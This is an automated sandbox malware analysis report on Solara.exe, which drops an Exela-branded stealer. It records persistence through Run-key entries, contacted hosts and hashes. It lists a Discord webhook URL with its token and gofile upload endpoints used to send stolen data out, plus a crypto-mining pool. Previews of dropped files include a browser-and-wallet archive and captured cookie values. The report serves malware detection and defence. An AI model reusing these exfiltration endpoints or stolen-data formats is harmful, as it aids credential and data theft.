C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe | 47% | ReversingLabs | Win64.Trojan.Cerbu |
C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | 83% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | 47% | ReversingLabs | Win64.Trojan.Cerbu |
C:\Users\user\AppData\Local\Temp\Exela.exe | 47% | ReversingLabs | Win64.Trojan.Cerbu |
C:\Users\user\AppData\Local\Temp\Solara.exe | 83% | ReversingLabs | Win64.Trojan.Generic |
C:\Users\user\AppData\Local\Temp\_MEI70882\VCRUNTIME140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_decimal.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_multiprocessing.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_queue.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\libcrypto-1_1.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\libffi-7.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\libssl-1_1.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\python3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\select.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\sqlite3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pyd | 0% | ReversingLabs | |
C:\Windows\Temp\ypynqohyxqjk.sys | 5% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  ip-api.com
                  208.95.112.1
                  truefalse
                    high
                    discordapp.com
                    162.159.134.233
                    truefalse
                      high
                      pool.hashvault.pro
                      192.248.189.11
                      truefalse
                        high
                        store1.gofile.io
                        45.112.123.227
                        truefalse
                          high
                          api.gofile.io
                          51.91.7.6
                          truefalse
                            high
Name | Malicious | Antivirus Detection | Reputation
https://discordapp.com/api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 | false | | high
http://ip-api.com/json | false | | high
https://api.gofile.io/getServer | false | | high
https://store1.gofile.io/uploadFile | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000003.00000002.1458447080.000001F9EFBD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1674670295.0000025669D25000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/pyca/cryptography/issues/8996 | Exela.exe | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mic | powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/pyca/cryptography/issues/9253 | Exela.exe | false | | high
https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file | Exela.exe | false | | high
http://crl.micft.cMicRosof | powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/pyca/cryptography/issues | Exela.exe | false | | high
[Map of contacted IPs by country; legend bands: No. of IPs < 25%, 25% to 50%, 50% to 75%, 75% and above]
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
80.240.16.67 | unknown | Germany | 20473 | AS-CHOOPAUS | false
51.91.7.6 | api.gofile.io | France | 16276 | OVHFR | false
45.112.123.227 | store1.gofile.io | Singapore | 16509 | AMAZON-02US | false
162.159.135.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
162.159.134.233 | discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
IP
127.0.0.1 (local/private address, not contacted externally)
                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1589392
                                                                            Start date and time:2025-01-12 07:09:18 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 12m 52s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:104
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Solara.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.rans.troj.adwa.spyw.evad.mine.winEXE@155/141@5/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 25%
                                                                            HCA Information:Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 172.202.163.200
                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target Solara.exe, PID 2044 because it is empty
• Execution Graph export aborted for target Solara.exe, PID 3700 because there are no executed functions
• Execution Graph export aborted for target Solara.exe, PID 3896 because there are no executed functions
• Execution Graph export aborted for target Solara.exe, PID 5852 because it is empty
• Execution Graph export aborted for target Solara.exe, PID 6364 because there are no executed functions
• Execution Graph export aborted for target conhost.exe, PID 4300 because there are no executed functions
                                                                            • Execution Graph export aborted for target powershell.exe, PID 1512 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 1532 because it is empty
                                                                            • Execution Graph export aborted for target rdqanwpudvuj.exe, PID 7076 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Solara.exe
Time | Type | Description
01:10:29 | API Interceptor | 119x Sleep call for process: powershell.exe modified
01:10:39 | API Interceptor | 2x Sleep call for process: Solara.exe modified
07:10:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
07:10:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
07:11:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Exela C:\Users\user\AppData\Local\Temp\Exela.exe
07:11:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Exela C:\Users\user\AppData\Local\Temp\Exela.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | ip-api.com/json/?fields=225545
208.95.112.1 | F0DgoRk0p1.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | fpY3HP2cnH.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 4287eV6mBc.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | aik1mr9TOq.exe | malicious | Predator | ip-api.com/json/
208.95.112.1 | DUWPFaZd3a.exe | malicious | AgentTesla, DarkTortilla | ip-api.com/line/?fields=hosting
208.95.112.1 | tb4B9ni6vl.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | juE8dtqPkx.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | YY3k9rjxpY.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 4LbgdNQgna.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
80.240.16.67 | xmr new.exe | malicious | Xmrig |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discordapp.com | gshv2.exe | malicious | Unknown | 162.159.129.233
discordapp.com | PO_11171111221.Vbs.vbs | malicious | FormBook | 162.159.129.233
discordapp.com | WO-663071 Sabiya Power Station Project.vbs | malicious | Remcos | 162.159.129.233
discordapp.com | sNifdpWiY9.exe | malicious | Metasploit, Meterpreter | 162.159.134.233
discordapp.com | saloader.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.129.233
discordapp.com | EsgeCzT4do.exe | malicious | XWorm | 162.159.129.233
discordapp.com | file.exe | malicious | Unknown | 162.159.135.233
discordapp.com | file.exe | malicious | CStealer | 162.159.134.233
discordapp.com | https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4& | malicious | Unknown | 162.159.135.233
discordapp.com | RLesaPFXew.exe | malicious | SilverRat | 162.159.133.233
s-part-0017.t-0009.t-msedge.net | https://terrific-metal-countess.glitch.me/ | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ | malicious | HTMLPhisher, Mamba2FA | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | SAMPLE_5.exe.bin.exe | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | drW0xB3OBb.dll | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | FEdTp2g4xD.exe | malicious | FormBook | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 305861283730376077.js | malicious | Strela Downloader | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 1274320496157183071.js | malicious | Strela Downloader | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 944924352317221058.js | malicious | Strela Downloader | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | kzQ25HVUbf.exe | malicious | Lokibot | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | huuG7N3jOv.exe | malicious | FormBook | 13.107.246.45
ip-api.com | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
ip-api.com | F0DgoRk0p1.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | fpY3HP2cnH.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 4287eV6mBc.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | aik1mr9TOq.exe | malicious | Predator | 208.95.112.1
ip-api.com | DUWPFaZd3a.exe | malicious | AgentTesla, DarkTortilla | 208.95.112.1
ip-api.com | tb4B9ni6vl.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | juE8dtqPkx.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | YY3k9rjxpY.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 4LbgdNQgna.exe | malicious | AgentTesla | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
OVHFR | https://adopt0098.bitbucket.io/ | malicious | HTMLPhisher | 91.134.82.79
OVHFR | https://talktalk770.weebly.com/ | malicious | HTMLPhisher | 217.182.178.233
OVHFR | DB5rQYsfd6.exe | malicious | Remcos | 198.50.242.157
OVHFR | https://ville-tonnerre.com/CR_CM/config/information.php?access.x61307366953&&data.x=en_3abae6f9aa37b42f5c9bf622c | malicious | Unknown | 213.186.33.19
OVHFR | Yv24LkKBY6.exe | malicious | Unknown | 94.23.158.211
OVHFR | Yv24LkKBY6.exe | malicious | Unknown | 94.23.158.211
OVHFR | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 151.80.4.227
OVHFR | 4.elf | malicious | Unknown | 164.133.191.35
OVHFR | frosty.x86.elf | malicious | Mirai | 51.178.95.194
OVHFR | https://www.depoqq.win/geno | malicious | Unknown | 54.36.150.184
AS-CHOOPAUS | 80P.exe | malicious | I2PRAT | 207.246.88.73
AS-CHOOPAUS | 4.elf | malicious | Unknown | 44.40.164.148
AS-CHOOPAUS | zE1VxVoZ3W.exe | malicious | FormBook | 78.141.202.204
AS-CHOOPAUS | Fantazy.mpsl.elf | malicious | Unknown | 44.40.164.150
AS-CHOOPAUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | 192.248.189.11
AS-CHOOPAUS | miori.x86.elf | malicious | Unknown | 44.175.18.157
AS-CHOOPAUS | xmr new.exe | malicious | Xmrig | 80.240.16.67
AS-CHOOPAUS | eth.exe | malicious | Xmrig | 192.248.189.11
AS-CHOOPAUS | cZO.exe | malicious | Unknown | 108.61.189.74
AS-CHOOPAUS | Fantazy.arm7.elf | malicious | Mirai | 149.253.168.94
TUT-ASUS | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
TUT-ASUS | F0DgoRk0p1.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | fpY3HP2cnH.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 4287eV6mBc.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | aik1mr9TOq.exe | malicious | Predator | 208.95.112.1
TUT-ASUS | DUWPFaZd3a.exe | malicious | AgentTesla, DarkTortilla | 208.95.112.1
TUT-ASUS | tb4B9ni6vl.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | juE8dtqPkx.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | YY3k9rjxpY.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 4LbgdNQgna.exe | malicious | AgentTesla | 208.95.112.1
                                                                              No context
Match: C:\Users\user\AppData\Local\Temp\_MEI70882\VCRUNTIME140.dll
Associated samples (name / detection / threat name):
• 9g9LZNE4bH.exe / malicious / Blank Grabber
• Holoscope-V1.3.5.exe / malicious / Unknown
• dsoft.exe / malicious / Python Stealer, Creal Stealer
• winws1.exe / malicious / Unknown
• discord.exe / malicious / Unknown
• file.exe / malicious / Unknown
• cmd.exe / malicious / Blank Grabber
• NEVER OPEN!.exe / malicious / Python Stealer, Empyrean, Discord Token Stealer
• HeilHitler.exe / malicious / Blank Grabber
• meN9qeS2DE.exe / malicious / XWorm
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9949634
                                                                                                  Entropy (8bit):7.9953008751482715
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:196608:bvcgJ3xukvmvNm1E8giq1g9KDeNMHFJMIDJ+gsAGKkRcSRK3ICT:Lc4m1m1NqV44Fqy+gs1hOIC
                                                                                                  MD5:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  SHA1:90D67801DCFF362CE2C2ACCAFD5010C7F79567D6
                                                                                                  SHA-256:573A7F2FA701A7630318119D9E6D916CB8A0ACD87A0A2797B7197E9AE85C0071
                                                                                                  SHA-512:40D702B8FD2993AEEB09755E760D3611D76F927AE6831AB7066386D3A133257E06330DDFF2D28406B77C1D9E502E79A7A72B8984CE0D795948DA07DD03B9BEA9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5527040
                                                                                                  Entropy (8bit):6.581917643476937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:WTbZDzL0GH1JmXFBbbYnHhcWACCR2rbh27ns0ftj371GJfo0PhtpQ9un:ebZDfHmXzIHSWbI2rAnXdxG5PhtpQM
                                                                                                  MD5:089094590DF5698B03A7428A5864ED33
                                                                                                  SHA1:6A4866B798A38E40B61095E2C4A6861B15F4CABB
                                                                                                  SHA-256:C3B138B65057D5A27D859763974A3AFE5DF2693CE64326D36AE8784D092929C7
                                                                                                  SHA-512:001C4AEEDDCBFAA9B979E81B742391C6EC6F9400B23B8B5827C69C7E8C36BD9E8576146F0487C3522DECA21E1488A36C948DFF3C69B2C441406F2081EAD09E4D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9949634
                                                                                                  Entropy (8bit):7.9953008751482715
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:196608:bvcgJ3xukvmvNm1E8giq1g9KDeNMHFJMIDJ+gsAGKkRcSRK3ICT:Lc4m1m1NqV44Fqy+gs1hOIC
                                                                                                  MD5:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  SHA1:90D67801DCFF362CE2C2ACCAFD5010C7F79567D6
                                                                                                  SHA-256:573A7F2FA701A7630318119D9E6D916CB8A0ACD87A0A2797B7197E9AE85C0071
                                                                                                  SHA-512:40D702B8FD2993AEEB09755E760D3611D76F927AE6831AB7066386D3A133257E06330DDFF2D28406B77C1D9E502E79A7A72B8984CE0D795948DA07DD03B9BEA9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                  Process:C:\Users\user\Desktop\Solara.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):654
                                                                                                  Entropy (8bit):5.380476433908377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                  Malicious:true
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:dropped
                                                                                                  Size (bytes):672717
                                                                                                  Entropy (8bit):7.997988879641276
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:12288:4HDXpH8NIPE6Tp5JuK2DpveyOFTmzBAnooROh3+tZzf2T1rYzrDj:4jXpP/PJkNvO5mCooRO58f2T1cDj
                                                                                                  MD5:C586B2EC4E9D001FAB6A82C77FB7024E
                                                                                                  SHA1:1A2756E38A2D02462201B43A360C55F5FA866C75
                                                                                                  SHA-256:949B456B7B8F29C5F1A1A49EDA398E6E6360E5243505C4A324925063A16806AD
                                                                                                  SHA-512:8E19A0CCDD245498EFCA85FB6A4A9995F32322E2F9F2849C2D3BE4F18FA6CEEBCED836B6DD8F736FBCA1F51FD7972803612452D41AEC46738F9B886D3309435C
                                                                                                  Malicious:false
                                                                                                  Preview:PK........m.,Z................Browsers/PK........l.,Z................Wallets/PK........m.,ZG.W......E......Display (1).pngl..PS[..}.@.JG@z......wD.....F)RBM..T.(....R.......R.......$..{..o.a....a=.....I..4;.r.......m......`:C;.d......[3C.|Hp.......T....=...g....._O.A=.......5c.[!.,....>.0.:..u.K........t.+.T.......kT.CD..9?._..tG.sB.K;..........9z.cb88g.ff#}Z.F../U.}.%.e...5Wg....]O...+i..M{4...o.Y.R(N..p....~...>.+7{73H5b.....J...Yt'q.......*.......;.u.....q.P..`.s......y.Z..!.u..._..\.K...T"L4.g......|.....s.....L....,.]N)z>.....3..g.a......#C..oc+.....^...i.?......~y:_...S....+4Ku..E....n......9.......c=;....W._G..rX..:s.8..y...jU.7.u.. a9<..}...{.|Y.0 .J*.......MO=..0...R...;`.s..|=..'.....Jj................Zw.dU.>.U.c.xM...Q?V......F.._..|.f..$Q8gm.p.r.+.R..l.xkuJ.~...}N....F..=..._.\..l.U..4y.A.p..r.V...F...:oG.7......r.."..P.... ...Q?\^y.Pg.........i.OI. ...m@i]V.337..>g9t..`....3..<%<..P.PvN$.O.v...#..0.=....@.j..r..J(.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):432
                                                                                                  Entropy (8bit):5.365627083720754
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:Lv5hOs3rsLgxbh+3r4wyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqv5:L6s7JH+74xva3UhyL/8ObW0
                                                                                                  MD5:7C02C56F7D8D62510B3E7117500612A9
                                                                                                  SHA1:8F0FF1F5911101E6AB63418BB2FEBAACA431D2F2
                                                                                                  SHA-256:FF7A4ACC9936170BEC4315DC059166C35947BB1EBAFF79CB872BE680987802AA
                                                                                                  SHA-512:C21F998A73F557EBD6D4C4F160E5501B506B261E5D2CD058FAD0D9B453A469D640DFAF8970B3EB87A84FD3C4CBB0DE260309C1A769875E895DF88E8CCFE921A4
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================...google.com.TRUE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07...google.com.TRUE./.FALSE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1707
                                                                                                  Entropy (8bit):4.080991549130857
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:L5xsMvXvxsajXJl1QXbsBQXY6CQExXBYGQ/DQq:LzlVVgmHgWdIL
